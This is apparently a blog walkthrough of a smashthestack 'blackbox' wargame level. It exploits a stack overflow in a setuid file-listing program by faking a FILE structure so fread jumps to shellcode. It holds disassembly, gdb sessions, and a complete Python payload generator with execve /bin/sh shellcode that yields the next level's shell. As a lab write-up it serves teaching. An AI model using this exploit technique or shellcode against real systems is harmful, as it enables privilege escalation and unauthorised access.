As in the previous posts, the password for the next level has been replaced with question marks so as to not make this too obvious, and so that the point of the walkthrough, which is mainly educational, will not be missed.

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Hello again. Make sure you are comfortable, because this is going to be a somewhat long level, and rather more difficult that what we saw so far.

First order of business, login & ls:

$ssh -p 2225 level5@blackbox.smashthestack.org level5@blackbox.smashthestack.org's password: ... level5@blackbox:~$ ls -l
total 560
-rwsr-xr-x 1 level6 level6 557846 2008-01-12 21:17 list
-rw-r--r-- 1 root   level5    475 2007-12-29 14:10 list.c
-rw-r--r-- 1 root   level5     10 2007-12-29 14:10 password


And now we take a look at the source file:

#include <stdio.h>

int main(int argc, char **argv)
{
char buf[100];
size_t len;
char fixedbuf[10240];
FILE *fh;
char *ptr = fixedbuf;
int i;

fh = fopen("somefile", "r");
if(!fh)
return 0;

while((len = fread(buf, 1, 100, fh)) > 0) {
for(i = 0; i < len; i++) {
// Disable output modifiers
switch(buf[i]) {
case 0xFF:
case 0x00:
case 0x01:
break;
default:
*ptr = buf[i];
ptr++;
}
}
}
printf("%s", fixedbuf);

fclose(fh);
}


The program seems to open some fixed file from the current path (which means that we will have to generate that "somefile" file under /tmp), it then proceeds to read chunks of 100 bytes from the file into some temporary buffer, which are copied to a bigger buffer while filtering-out specific byte values.

The contents of the big buffer are then printed out to us.

Well, our attack surface is obviously the file filename. We can also notice that if filename is indeed longer than 10240 bytes, the read-chunk-and-copy loop will happily continue its business, whereby it will probably mess up the stack.

So lets try and see what the stack frame looks like. And the way to do that is to look at the diassembly of main:

level5@blackbox:~$objdump -d list|grep -A65 "<main>:" 08048208 <main>: 8048208: 8d 4c 24 04 lea 0x4(%esp),%ecx 804820c: 83 e4 f0 and$0xfffffff0,%esp
804820f: ff 71 fc              pushl  0xfffffffc(%ecx)
8048212: 55                    push   %ebp
8048213: 89 e5                 mov    %esp,%ebp
8048215: 51                    push   %ecx
8048216: 81 ec 94 28 00 00     sub    $0x2894,%esp 804821c: 8d 85 88 d7 ff ff lea 0xffffd788(%ebp),%eax 8048222: 89 45 f4 mov %eax,0xfffffff4(%ebp) 8048225: c7 44 24 04 88 32 0a movl$0x80a3288,0x4(%esp)
804822c: 08
804822d: c7 04 24 8a 32 0a 08  movl   $0x80a328a,(%esp) 8048234: e8 57 af 00 00 call 8053190 <_IO_new_fopen> 8048239: 89 45 f0 mov %eax,0xfffffff0(%ebp) 804823c: 83 7d f0 00 cmpl$0x0,0xfffffff0(%ebp)
8048240: 75 43                 jne    8048285 <main+0x7d>
8048242: c7 85 78 d7 ff ff 00  movl   $0x0,0xffffd778(%ebp) 8048249: 00 00 00 804824c: e9 8f 00 00 00 jmp 80482e0 <main+0xd8> 8048251: c7 45 f8 00 00 00 00 movl$0x0,0xfffffff8(%ebp)
8048258: eb 23                 jmp    804827d <main+0x75>
804825a: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
804825d: 0f b6 44 05 88        movzbl 0xffffff88(%ebp,%eax,1),%eax
8048262: fe c0                 inc    %al
8048264: 3c 02                 cmp    $0x2,%al 8048266: 77 02 ja 804826a <main+0x62> 8048268: eb 10 jmp 804827a <main+0x72> 804826a: 8b 45 f8 mov 0xfffffff8(%ebp),%eax 804826d: 0f b6 54 05 88 movzbl 0xffffff88(%ebp,%eax,1),%edx 8048272: 8b 45 f4 mov 0xfffffff4(%ebp),%eax 8048275: 88 10 mov %dl,(%eax) 8048277: ff 45 f4 incl 0xfffffff4(%ebp) 804827a: ff 45 f8 incl 0xfffffff8(%ebp) 804827d: 8b 45 f8 mov 0xfffffff8(%ebp),%eax 8048280: 3b 45 ec cmp 0xffffffec(%ebp),%eax 8048283: 72 d5 jb 804825a <main+0x52> 8048285: 8b 45 f0 mov 0xfffffff0(%ebp),%eax 8048288: 89 44 24 0c mov %eax,0xc(%esp) 804828c: c7 44 24 08 64 00 00 movl$0x64,0x8(%esp)
8048293: 00
8048294: c7 44 24 04 01 00 00  movl   $0x1,0x4(%esp) 804829b: 00 804829c: 8d 45 88 lea 0xffffff88(%ebp),%eax 804829f: 89 04 24 mov %eax,(%esp) 80482a2: e8 09 b0 00 00 call 80532b0 <_IO_fread> 80482a7: 89 45 ec mov %eax,0xffffffec(%ebp) 80482aa: 83 7d ec 00 cmpl$0x0,0xffffffec(%ebp)
80482ae: 0f 95 c0              setne  %al
80482b1: 84 c0                 test   %al,%al
80482b3: 75 9c                 jne    8048251 <main+0x49>
80482b5: 8d 85 88 d7 ff ff     lea    0xffffd788(%ebp),%eax
80482bb: 89 44 24 04           mov    %eax,0x4(%esp)
80482bf: c7 04 24 93 32 0a 08  movl   $0x80a3293,(%esp) 80482c6: e8 e5 ab 00 00 call 8052eb0 <_IO_printf> 80482cb: 8b 45 f0 mov 0xfffffff0(%ebp),%eax 80482ce: 89 04 24 mov %eax,(%esp) 80482d1: e8 0a ac 00 00 call 8052ee0 <_IO_new_fclose> 80482d6: c7 85 78 d7 ff ff 00 movl$0x0,0xffffd778(%ebp)
80482dd: 00 00 00
80482e0: 8b 85 78 d7 ff ff     mov    0xffffd778(%ebp),%eax
80482e6: 81 c4 94 28 00 00     add    $0x2894,%esp 80482ec: 59 pop %ecx 80482ed: 5d pop %ebp 80482ee: 8d 61 fc lea 0xfffffffc(%ecx),%esp 80482f1: c3 ret  Wow, good thing the executable has symbol information, because the way to identify the position of the local variables in the stack is by tracking library function calls. Lets start with these two lines though:  804821c: 8d 85 88 d7 ff ff lea 0xffffd788(%ebp),%eax 8048222: 89 45 f4 mov %eax,0xfffffff4(%ebp)  This looks like an address assignment, we have such a line in the C program: char *ptr = fixedbuf;  This means that fixedbuf starts at ebp-0x2878, and ptr is stored at ebp-0xc. Next we have a call to _IO_new_fopen:  8048225: c7 44 24 04 88 32 0a movl$0x80a3288,0x4(%esp)
804822c: 08
804822d: c7 04 24 8a 32 0a 08  movl   $0x80a328a,(%esp) 8048234: e8 57 af 00 00 call 8053190 <_IO_new_fopen> 8048239: 89 45 f0 mov %eax,0xfffffff0(%ebp)  And the output, which is a file pointer, is stored at ebp-0x10, which must be our fp. Now let’s look at the call to _IO_fread:  8048285: 8b 45 f0 mov 0xfffffff0(%ebp),%eax 8048288: 89 44 24 0c mov %eax,0xc(%esp) 804828c: c7 44 24 08 64 00 00 movl$0x64,0x8(%esp)
8048293: 00
8048294: c7 44 24 04 01 00 00  movl   $0x1,0x4(%esp) 804829b: 00 804829c: 8d 45 88 lea 0xffffff88(%ebp),%eax 804829f: 89 04 24 mov %eax,(%esp) 80482a2: e8 09 b0 00 00 call 80532b0 <_IO_fread> 80482a7: 89 45 ec mov %eax,0xffffffec(%ebp)  The first parameter is at the bottom of the stack (at esp), this should be the address of buf, and we can see it is ebp-0x78. The rest of the parameters are already known to us so I won’t stall on them. What’s left in this function call is the return value, which is stored at ebp-0x14 and is our len. The last local variable is i, we can recognize it as the address that gets loaded with a 0, as we can see in the for loop initialization. There are actually two such instances. This is the first one:  8048242: c7 85 78 d7 ff ff 00 movl$0x0,0xffffd778(%ebp)


Which is the return value of main, as we can see eax is reloaded from that address right before exiting main:

 80482e0: 8b 85 78 d7 ff ff     mov    0xffffd778(%ebp),%eax
80482e6: 81 c4 94 28 00 00     add    $0x2894,%esp 80482ec: 59 pop %ecx 80482ed: 5d pop %ebp 80482ee: 8d 61 fc lea 0xfffffffc(%ecx),%esp 80482f1: c3 ret  The second one is the one that interests us:  8048251: c7 45 f8 00 00 00 00 movl$0x0,0xfffffff8(%ebp)


Which means i is stored at ebp-0x8.

Let’s summarize it all up in one diagram:

Imagine now the following scenario: We have a very big file, and the read-chunk-and-copy loop keeps copying the data from buf into fixedbuf. After 102 of these cycles, ptr is pointing to fixedbuf+10200, or, buf-40. After the next cycle, ptr will point to buf+60. This means, that on the next read (104’th if my tally has been kept correctly) ptr will end up pointing beyond the stack frame.

Not entirely though. The thing is, that the copying is not done in one atomic operation, rather, buf is copied to ptr byte-by-byte, which means that 40 bytes into the 104’th cycle, the value of len will change. This affects the flow control of the for-loop, because if we make len smaller than i is in that round, the loop will stop.

Since x86 is a little-endian machine, the first byte of len that will be overwritten is the LSB, so we need to overwrite it so that the loop continues, anything larger than 101 will do.

Now, remember that not all byte values are allowed, and if we want to reach interesting places in the stack, we are forced to write the rest of len. This means that the smallest value we can write is 0x02, and this will make len look something like 0x020202?? when we are done with it.

Next we override fp, again, we can’t help but to overwrite it. Let’s leave the discussion about it for later though.

After that comes ptr, and this is where it gets tricky, we are overwriting the pointer, using itself as a pointer to its individual bytes. whichever way it goes, once we overwrite the LSB, the pointer will not point to itself anymore, so we need to decide were we want it to point. Well, how about skipping over the rest of ptr, and continue at the MSB of i.

Why would we want to do that? well, remember we put something like 0x020202?? in len? then if we set the MSB of i to 0x03, then i will look like 0x03?????? which is bigger than len! so after that the loop will stop.

Why do we want it to stop now? Well, you see, when the loop on i stops, there will be another call to fread, only now, fp is different.

What would happen? Well, let’s take a look at that _IO_fread (cropped in favor of readability):

080532b0 <_IO_fread>:
80532b0: 55                    push   %ebp
80532b1: 89 e5                 mov    %esp,%ebp
80532b3: 83 ec 2c              sub    $0x2c,%esp 80532b6: 89 75 f8 mov %esi,0xfffffff8(%ebp) 80532b9: 8b 75 0c mov 0xc(%ebp),%esi 80532bc: 89 7d fc mov %edi,0xfffffffc(%ebp) 80532bf: 8b 7d 10 mov 0x10(%ebp),%edi 80532c2: 89 5d f4 mov %ebx,0xfffffff4(%ebp) 80532c5: 0f af f7 imul %edi,%esi 80532c8: 85 f6 test %esi,%esi 80532ca: 0f 84 a4 00 00 00 je 8053374 <_IO_fread+0xc4> 80532d0: 8b 55 14 mov 0x14(%ebp),%edx 80532d3: c7 45 e0 00 00 00 00 movl$0x0,0xffffffe0(%ebp)
80532da: 8b 02                 mov    (%edx),%eax
80532dc: 25 00 80 00 00        and    $0x8000,%eax 80532e1: 66 85 c0 test %ax,%ax 80532e4: 75 1f jne 8053305 <_IO_fread+0x55> 80532e6: b8 00 00 00 00 mov$0x0,%eax
80532eb: 85 c0                 test   %eax,%eax
80532ed: c7 45 e0 00 00 00 00  movl   $0x0,0xffffffe0(%ebp) 80532f4: 0f 85 7e 00 00 00 jne 8053378 <_IO_fread+0xc8> 80532fa: 8b 45 14 mov 0x14(%ebp),%eax 80532fd: 89 04 24 mov %eax,(%esp) 8053300: e8 bb 40 02 00 call 80773c0 <_IO_flockfile> 8053305: 8b 55 14 mov 0x14(%ebp),%edx 8053308: 8b 45 08 mov 0x8(%ebp),%eax 805330b: 89 74 24 08 mov %esi,0x8(%esp) 805330f: 89 14 24 mov %edx,(%esp) 8053312: 89 44 24 04 mov %eax,0x4(%esp) 8053316: e8 b5 38 00 00 call 8056bd0 <_IO_sgetn> 805331b: 8b 55 14 mov 0x14(%ebp),%edx 805331e: 89 c3 mov %eax,%ebx 8053320: 8b 02 mov (%edx),%eax 8053322: 25 00 80 00 00 and$0x8000,%eax
8053327: 66 85 c0              test   %ax,%ax
805332a: 74 37                 je     8053363 <_IO_fread+0xb3>
...


First, let’s remember what are the parameters to _IO_fread, in what order are they in the stack, and where can we see them in the disassembly.

Well, the parameters were (at the bottom) buf, then the chunk length (=1), then the number of chunks (100) and finally fp.

This means that inside _IO_fread, we can find fp at ebp+0x14. Let’s see what does the function do with it:

 80532d0: 8b 55 14              mov    0x14(%ebp),%edx
80532d3: c7 45 e0 00 00 00 00  movl   $0x0,0xffffffe0(%ebp) 80532da: 8b 02 mov (%edx),%eax 80532dc: 25 00 80 00 00 and$0x8000,%eax
80532e1: 66 85 c0              test   %ax,%ax
80532e4: 75 1f                 jne    8053305 <_IO_fread+0x55>


The long-word to which fp points is copied into eax, after which it is masked with 0x8000, and if that bit is set, it jumps to 0x08053305:

 8053305: 8b 55 14              mov    0x14(%ebp),%edx
8053308: 8b 45 08              mov    0x8(%ebp),%eax
805330b: 89 74 24 08           mov    %esi,0x8(%esp)
805330f: 89 14 24              mov    %edx,(%esp)
8053312: 89 44 24 04           mov    %eax,0x4(%esp)
8053316: e8 b5 38 00 00        call   8056bd0 <_IO_sgetn>


This is a call to _IO_sgetn with fp as the first parameter.

Fine, let’s see what _IO_sgetn does:

08056bd0 <_IO_sgetn>:
8056bd0: 55                    push   %ebp
8056bd1: 89 e5                 mov    %esp,%ebp
8056bd3: 8b 55 08              mov    0x8(%ebp),%edx
8056bd6: 5d                    pop    %ebp
8056bd7: 8b 8a 94 00 00 00     mov    0x94(%edx),%ecx
8056bdd: 8b 49 20              mov    0x20(%ecx),%ecx
8056be0: ff e1                 jmp    *%ecx
8056be2: 8d b4 26 00 00 00 00  lea    0x0(%esi),%esi
8056be9: 8d bc 27 00 00 00 00  lea    0x0(%edi),%edi


In the context of _IO_sgetn, fp is located at ebp+0x8.

Well, there’s some pointer magic that’s happening here, after which there a jump to a location stored in ecx.

let’s try to write it a more readable C notation:

edx = fp;
ecx = *(unsigned long *)(edx + 0x94);
ecx = *(unsigned long *)(ecx + 0x20);


It looks like fp actually points to some structure, which contains pointers to other structures, which contain an address of a handler.

Well, if we can make the program jump to our handler, we can make it execute a shell.

OK then, let’s look back and review what we know, and decide on a strategy.

First, we have found a way to override fp, and then stop the loop and make fread run again.

Then we saw that in fread, some address is extracted from fp, and then the program jumps to that address.

I propose then the following strategy: . We override fp with the address of the bottom of fixedbuf. . We prepare the first long word at the bottom of fixedbuf to be something like 0x????80??, so as to steer the execution path in our direction. . 0x94 bytes after the beginning of fixedbuf, we prepare a pointer to another place in fixedbuf. let’s call it ptr1. . 0x20 bytes after ptr1, we will prepare another address which will be the address of our shellcode.

It should be much easier to understand this in a diagram:

This is the structure we need to have in the beginning of our file.

Assuming we know ebp, the end of the file (meaning, starting from the point in which we overwrite len) should look like this: . First 0x70, just to make sure we keep the for-loop alive. . Then 0x020202 because we have to . Then we overwrite fp with fixedbuf=ebp-0x2878 . Then we overwrite the LSB of ptr with the address of the second to MSB of i. That is because after we overwrite the LSB of ptr, it will get incremented in the next line of code, this would make ptr point to the LSB of i. . And then we overwrite the MSB of i with 0x03 which will cause the loop to stop, and let the bottom of the file do its magic. . Between the beginning and the end, we need to fill the space with something.

The only open question left is - what is ebp?

Let’s take a look:

level5@blackbox:~$gdb list ... (gdb) break main Breakpoint 1 at 0x8048216 (gdb) run Starting program: /home/level5/list Breakpoint 1, 0x08048216 in main () (gdb) p$ebp
$1 = (void *) 0xbfffd8f8  Well, this means that we need to override fp with ebp-0x2878=0xbfffb080. This is not good, because in 0xbfffb0a0 we have 0xff which we can not write. This pretty much closes the lid on everything we were planning so far, because the basic premise of the entire strategy is that we can redirect fp to our own file structure. However, we should not abandon all hope, because we have the power to make the stack begin much lower by simply feeding some very long argument to the program. Let’s see how this works: (gdb) run python -c "print 'a'*0x100" Starting program: /home/level5/list python -c "print 'a'*0x100" Breakpoint 1, 0x08048216 in main () (gdb) p$ebp
$1 = (void *) 0xbfffd7f8  This address is lower by 0x100 bytes than ebp when running without parameters. Let’s try again now with an even larger number: (gdb) run python -c "print 'a'*0x10000" The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/level5/list python -c "print 'a'*0x10000" Breakpoint 1, 0x08048216 in main () (gdb) p$ebp
$2 = (void *) 0xbffed8f8  Bingo! that is our ebp for reasons I’ll go into in a pending article. Suffice to say that when running list inside gdb we have argv[0]=/home/level5/list (as I highlighted above) , and when running from /tmp we have argv[0]=/home/level5/list, which are the same. Well, now that we have all our constants and strategies settled down, we can generate the input file. I like using scripts: import struct EBP = 0xbffed8f8 FIXEDBUF = EBP - 0x2878 I = EBP - 0x8 PTR1 = FIXEDBUF + 0x98 PTR2 = FIXEDBUF + 0xbc SHELLCODE = "31c050682f2f7368682f62696e89e3505389e131d2b00bcd80".decode("hex") FILE = "" FILE += struct.pack("<L", 0x08080808) FILE += '\x90' * 0x90 FILE += struct.pack("<L", PTR1) FILE += '\x90' * 0x20 FILE += struct.pack("<L", PTR2) FILE += SHELLCODE FILE += '\x90' * (10340 - len(FILE)) FILE += struct.pack("<L", 0x02020270) FILE += struct.pack("<L", FIXEDBUF) FILE += struct.pack("<L", I + 2)[0] FILE += '\x03' f = open('somefile', 'wb') f.write(FILE) f.close()  Let’s give it a shot: level5@blackbox:/tmp$ python genfile.py
level5@blackbox:/tmp$~/list python -c "print 'a'*0x10000" sh-3.1$ cat /home/level6/password
???????????????


And we’re done!